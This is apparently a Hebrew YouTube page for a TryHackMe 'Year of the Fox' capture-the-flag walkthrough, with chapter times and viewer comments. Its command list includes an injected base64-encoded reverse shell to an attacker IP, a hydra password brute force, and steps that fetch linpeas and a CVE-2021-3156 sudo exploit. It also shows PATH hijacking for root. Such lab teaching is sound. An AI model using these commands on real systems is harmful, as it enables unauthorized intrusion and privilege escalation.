פריצה בלייב | הדרכת אתגר סייבר | THM Year of the Fox
Вставка
- Опубліковано 21 лип 2024
- אני מדריך אתכם שלב אחר שלב בפתרון אתגר הסייבר Year of the Fox.
כלים וטכניקות: nmap, SMB enumeration, hydra, password attack, command injection, Burp Suite proxy, python, socat port forwarding, netcat, reverse shell, decode, PATH, linpeas, exploit root
// קישורים //
קישור לאתגר: tryhackme.com/room/yotf
הירשמו לערוץ שלי: tinyurl.com/SubsAviCyber
היכנסו לערוץ שלי: @AviSevillia
// פקודות שימושיות מהאתגר //
Some usefull commands from the ch
nmap -F -A IP
enum4linux -a IP | grep -iv unknown
hydra -l "rascal" -P "/usr/share/wordlists/rockyou.txt" IP http-get "/"
nc -nvlp 4444
Second Injection code: txt\" ;echo \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNy41Mi41Mi80NDQ0IDA+JjEK\" | base64 -d | bash ; echo \"
find / -name "*flag*"
cat /var/www/web-flag.txt
dpkg --print-architecture
python -m http.server 8000
wget ATTACK_MACHINE_IP:8000/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64
./socat tcp-listen:8888,fork tcp:127.0.0.1:22 &
ssh -p 8888 fox@TARGET_IP
cat user-flag.txt
strings /usr/sbin/shutdown
which poweroff
chmod +x poweroff
export PATH=/tmp:$PATH
sudo shutdown
find /home -type f -size +1c -size -200c
cat /home/rascal/.did-you-think-I-was-useless.root
git clone github.com/CptGibbon/CVE-2021...
tar -cvf CVE-2021-3156.tar CVE-2021-3156
wget 10.17.52.52:9000/CVE-2021-3156.tar
// פרקים //
00:00 תכנית הפריצה
02:05 סביבת הפריצה
04:20 סריקת פורטים nmap
07:54 סריקת SMB
11:02 תקיפת סיסמאות http
14:06 החדרת פקודה - command injection ו encoding
39:14 איתור הדגל web flag
41:52 decoding
46:52 priviledge escalation with linpeas
52:20 port forwarding with socat
57:58 תקיפת סיסמאות ssh
59:59 איתור הדגל user flag
1:00:25 priviledge escalation with linpeas
1:02:45 sudo PATH overwriting
1:09:00 השגת הדגל root flag
1:12:11 sudo exploit
1:18:07 המלצות להמשך
ללא ספק הערוץ הישראלי הכי טוב בתחום
בשמחה
מוזיקת רקע מפריעה מאוד.
תודה על השיתוף.האם עוצמת המוזיקה הפריעה, או עצם קיום מוזיקת הרקע?
בכללי, לי זה הפריע.
מניח שאם היה חלש יותר אז פחות.
אם זה היה תלוי בי הייתי מוותר על זה לגמרי.
תודה רבה על ההערה הבונה. אשתדל להוריד בסרטונים הבאים. @@sharonhadad6110
אין צורך להוריד, פשוט להוריד את הווליום שלה :)
קליפ נחמד@@AviSevillia
מעולה, מדבר ברור, מסביר מעולה, הכל ממש ברור ומובן. תודה רבה לך!
בשמחה רבה. תודה רבה על התגובה.
תודה רבה אבי אהבתי מאוד ❤
בשמחה רבה
תודה רבה מחכה לעוד...
בשמחה. כל שבוע יוצא שיעור נוסף. תעקוב בערוץ.
סרטונים מעניינים, תודה.
בשמחה
@@AviSevillia תוכל לעשות מדריך על כלים שימושיים שכדי לדעת? יש לך אחלה ידע אשמח אם תוכל לעשות סירטונים קצרים יותר ולעשות כול מני מדריכים שימושיים ודברים שכדי לדעת יכול להיות טוב! אני חדש בכול תחום אבטחת מידע יש לי ידע קטן בתכנות אני רוצה להתחיל להיכנס לתחום הזה אשמח לעוד מדריכים ספציפים שכדי לדעת.
בשמחה רבה. האמת שאני חושב לעשות הדרכה יסודית מאפס לכל מי שנכנס לעולם הסייבר. צריך קצת סבלנות זה יקח זמן, אבל אשתדל להכניס כל פעם סרטון בנושא מסויים. החכמה זה לא רק לדעת כלים, צריך לראות תמונה קצת יותר רחבה, ואת כל זה אני ארצה ללמד. תודה רבה על התגובה זה מחזק אותי לעשות עוד סרטונים.
@@AviSevilliaבכיף, קיבלת את העוקב שלי! אני יחכה לעוד סרטונים נשמע מעניין מאוד.
בנוסף : אם תוכל לסרטונים הבאים להגדיל את כול הכתיבה בטרמינל הפונט נורא קטן וקשה לעקוב אחרי הפקודות שאתה רושם
אבדוק. תודה רבה על הטיפ.
🔥🔥
בשמחה
לא הבנתי איך השרת מחזיר את שמות היוזרים, האם ככה גם כל שרת vps מחזיר? זה נשמע כמו כשל אבטחה
שלום מוטי.
אחת השיטות לבצע סריקת יוזרים על ה SMB זה באמצעות RID cycling.
SID הוא מזהה אבטחה שמזהה משתמשים, קבוצות, ומחשבים ברשת. לדוגמא S-1-22-1-1000.
RID הוא מזהה יחסי ל SID.
ה SID בנוי ממזהה הדומיין (מזהה דומיין או מחשב) וה RID שהוא מזהה security principal ספציפי בדומיין/מחשב.
כדי לזהות את שם מהשתמש מתוך ה SID, יש מנגנון שנקרא Translation. לכן מה שקרה פה שהכלי ביקש Translation של
S-1-22-1-1000, S-1-22-1-1001, ... ולפי זה קיבל את שמות המשתמשים.
כמובן שיש פה בעיית אבטחה, וניתן לפתור אותה ע"י עדכון קונפיגורציה שמונעת אפשרות לביצוע Translation ע"י משתמשים אנונימים.
פרטים על הקונפיגורציה הנ"ל ניתן לראות בקישור הזה:
learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-allow-anonymous-sidname-translation
באתגר הזה ניצלנו בעצם קונפיגורציה לא מאובטחת של השרת.
הסברים מעולים ומעניינים!
למה במקרה הזה כדי לקבל גישת רוט לא השתמשת בשיטה של הרצה של
env ?
כמו ב: ua-cam.com/video/hZd0sD1iXic/v-deo.html ?
היי. באתגר ההוא הוגדר SUID ל ENV ולכן היה אפשר לעשות מה שעשינו. מה שלא באתגר הזה.
שים לב שהרצנו
find / -type f -perm -04000 -ls
כדי לבדוק איזה פקודות הוגדר להם SUID
תודה על ההסבר @@AviSevillia
בשמחה רבה.
נשמח אם תוכל לשתף בתיאור את הפקודות שהשתמשת, והלינקים הרלוונטים של הסקריפטים וכו"
בשמחה. רעיון מצויין. אעשה את זה בהקדם שאתפנה. אם יהיו לך רעיונות נוספים לשיפור אשמח לשמוע.
הוספתי
@@AviSevillia תודה רבה תותח!
בשמחה רבה
היי, תוכל להעלות מדריכים מהבסיס יותר? כמו רקע לסייבר ,הסבר על התוכנות, ידע מקדים שכדאי שיהיה, וכו
בשמחה. אני מתכנן לעשות הדרכה מאפס בערוץ שלי. מקווה מאוד להגיע לזה בזמן הקרוב. תעקוב אחרי הערוץ ותוכל לראות כאשר יעלו הסרטונים.
@@AviSevillia תודה. עד אז תוכל לומר איזה ידע מקדים צריך לפני ההדרכה? Java ?php? לדוגמא
או שאתה מתכוון ללמד אפילו את הידע המקדים?
אפשר ללמוד PHP בינתיים.
אני בסופו של דבר גם אלמד את הידע המקדים, אבל לא אתחיל בזה, אלא אשלים בהמשך. לכן אם יש לך כעת זמן, תלמד מה שכתבתי לך.
בכל מקרה בהדרכות עצמן, אף שאין ידע מקדים, אני אסביר נקודתית כדי שגם מי שלא מכיר יוכל להבין.